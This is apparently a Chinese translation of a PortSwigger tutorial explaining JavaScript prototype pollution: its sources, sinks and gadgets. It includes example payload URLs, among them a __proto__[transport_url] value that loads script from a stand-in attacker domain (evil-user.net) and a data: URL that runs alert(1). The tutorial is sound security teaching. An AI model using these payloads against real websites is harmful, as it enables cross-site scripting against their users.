原型链污染
翻译
原文:https://portswigger.net/web-security/prototype-pollution
- name: 翻译
desc: 原文:https://portswigger.net/web-security/prototype-pollution
bgColor: '#F0DFB1'
textColor: 'green'
2
3
4
# 0什么是原型链污染?
原型链污染是一种 JavaScript 漏洞,攻击者可以向全局对象的原型添加任意属性,然后这些属性可能会被用户定义的对象所继承。
尽管 原型链污染 通常无法作为一个独立漏洞来利用,但它允许攻击者控制原本无法访问的对象属性。随后,如果应用程序以不安全的方式来处理攻击者所控属性,则这可能会链接其他漏洞。在客户端 JavaScript 中,这通常会导致 DOM型XSS;而在服务端原型链污染中,这甚至会导致远程代码执行。
实验室
如果你已经熟悉原型链污染背后的基本概念,并且只想在一些实际的、易受攻击的目标上练习和利用它们,那么你可以从下面的链接访问本主题中的所有实验室。
# 1原型链污染漏洞是如何产生的?
当 JavaScript 函数以递归方式将 包含用户可控属性的对象 合并到现有对象中,并且没有清理对象键的时候,通常会出现原型链污染漏洞。这使得攻击者可以注入类似__proto__的键,并在其中嵌套任意属性。
由于__proto__在 JavaScript 上下文中具有特殊含义 (opens new window),合并操作可能会将嵌套属性分配给对象的原型,而不是目标对象本身。因此,攻击者可以使用有害属性值来污染原型,随后,这些属性可能会被应用程序以危险的方式使用。
任何原型对象都有可能被污染,但这种情况最常发生在内置的全局Object.prototype (opens new window)中。
成功的原型链污染需要以下关键组成部分:
- 原型污染源 (opens new window) - 这可以是任何输入,使你可以用任意属性来污染原型对象。
- 接收器 (opens new window) - 换句话说,这就是一个可以执行任意代码的 JavaScript 函数或 DOM 元素。
- 可利用的小工具 (opens new window) - 这可以是任何属性,未经适当过滤或清理就传递到接收器中。
# 2原型污染源
原型污染源是某个用户可控输入,可以向原型对象添加任意属性。最常见的污染源如下:
- URL (opens new window) 中的查询或片段字符串(hash)
- 基于 JSON 的输入 (opens new window)
- Web 消息
# 2.1通过URL污染原型
考虑以下 URL,其中包含攻击者构造的查询字符串:
https:/?__proto__[恶意属性]=payload
在将查询字符串分解为key:value(键值对)时,URL 解析器可能会将__proto__解释为任意字符串。但让我们看看,如果这些键和值随后被当作属性,合并到现有对象中会发生什么。
你可能会误认为__proto__属性及其嵌套的恶意属性会按照以下方式添加到目标对象中:
{
existingProperty1: 'foo',
existingProperty2: 'bar',
__proto__: {
恶意属性: 'payload'
}
}
2
3
4
5
6
7
然而,事实并非如此。在某些时候,递归合并操作可能会使用以下语句(或其他类似语句)来分配恶意属性的值:
targetObject.__proto__.恶意属性 = 'payload';
在这个赋值期间,JavaScript 引擎将__proto__视为原型对象的间接引用。因此,恶意属性会被分配给__proto__所指向的原型对象,而不是目标对象(targetObject)本身。假设目标对象使用默认的Object.prototype(所有对象的原型),则当 JavaScript 运行时,所有对象都将会继承恶意属性,除非某个对象已经具有自己的属性和匹配的键。
在实践中,单纯地注入一个名为恶意属性的属性不太可能产生任何效果。但是,攻击者可以使用相同的技术,借助应用程序已使用的属性 或 任何导入的库来污染原型。
# 2.2通过JSON输入污染原型
对于一个用户可控对象,通常会使用JSON.parse()方法对 JSON 字符串进行解析。有趣的是,JSON.parse()会将 JSON 对象中的任何键视为一个字符串,包括__proto__之类的内容。这为原型链污染提供了另一个潜在的载体。
假设攻击者通过 Web 消息注入以下恶意 JSON:
{
"__proto__": {
"恶意属性": "payload"
}
}
2
3
4
5
如果通过JSON.parse()方法将其转换为 JavaScript 对象,则生成的对象实际上会具有一个键为__proto__的属性:
const objectLiteral = {__proto__: {恶意属性: 'payload'}};
const objectFromJson = JSON.parse('{"__proto__": {"恶意属性": "payload"}}');
objectLiteral.hasOwnProperty('__proto__'); // false
objectFromJson.hasOwnProperty('__proto__'); // true
2
3
4
5
随后,如果通过JSON.parse()创建的对象被合并到现有对象中,但没有经过适当的键过滤,这也会导致赋值过程中的原型链污染,正如我们在上面基于 URL 的示例 (opens new window)中看到的那样。
(译者加:这里的意思是
- 如果直接创建一个恶意对象(例如
objectLiteral),那么该对象身上的__proto__会被丢弃,无法有效地将其传递给目标应用程序。 - 但如果通过
JSON.parse()方法生成一个恶意对象(例如objectFromJson),其身上的__proto__会被当作一个属性完整保留下来。 )
# 3原型污染接收器
原型污染接收器本质上只是一个 JavaScript 函数或 DOM 元素,你可以通过被污染的原型来访问它,它能够使你执行任意 JavaScript 或系统命令。我们在 DOM XSS (opens new window) 主题中广泛介绍了一些客户端接收器。
由于原型链污染允许你 控制原本无法访问的属性,因此,这使你可以访问到目标应用程序中的许多其他接收器。对于不熟悉原型链污染的开发人员来说,可能会错误地认为这些属性是用户无法控制的,这意味着可能只存在少量的过滤或清理。
# 4原型污染小工具
小工具提供了一种将原型链污染漏洞 转化为 实际漏洞的方法。这可能是任何属性:
- 应用程序以不安全的方式使用该属性,例如 在未进行适当过滤或清理的情况下,将其传递到接收器中。
- 攻击者可通过原型链污染控制该属性的继承。换言之,必须有某一个对象能够继承攻击者所添加的原型属性,从而产生一个恶意版本的对象。
如果这个属性在对象本身上已有定义,则该属性不能作为小工具。在这种情况下,对象自身的属性 优先于 你所添加的恶意原型属性。一些健壮的网站 (opens new window)还可以显式地将对象的原型设置为null,以确保对象不会继承任何属性。
# 4.1原型污染小工具示例
许多 JavaScript 库都支持一个配置对象,开发人员可以使用该对象来设置不同的配置选项。开始时,库代码会检查这个对象,识别开发人员向其中添加的某些属性,如果有,则相应地调整配置。如果某些特定选项的属性不存在,则库代码通常会改用预定义的默认选项。一个简单的例子:
let transport_url = config.transport_url || defaults.transport_url;
现在,假设库代码使用这个transport_url向页面添加脚本引用:
let script = document.createElement('script');
script.src = `${transport_url}/example.js`;
document.body.appendChild(script);
2
3
如果网站的开发人员还没有为config对象设置transport_url属性,则这是一个潜在的小工具。攻击者可以使用自己的transport_url属性来污染全局Object.prototype,然后config对象将会继承该属性,最后,脚本的src将会被设置为攻击者选择的域。
例如,如果可以通过查询参数来污染原型,则攻击者只需诱使受害者访问特制的 URL,就可以使其浏览器从攻击者所控的域上导入恶意 JavaScript 文件:
https:/?__proto__[transport_url]=//evil-user.net
通过提供data:形式的 URL,攻击者还可以直接在查询字符串中嵌入 XSS 载荷,如下所示:
https:/?__proto__[transport_url]=data:,alert(1);//
请注意,在这个例子中,末尾的//只是为了注释掉硬编码的/example.js后缀。
接下来呢?
现在,你已经熟悉了原型链污染背后的概念,让我们来看看如何在实际应用中找到这些漏洞: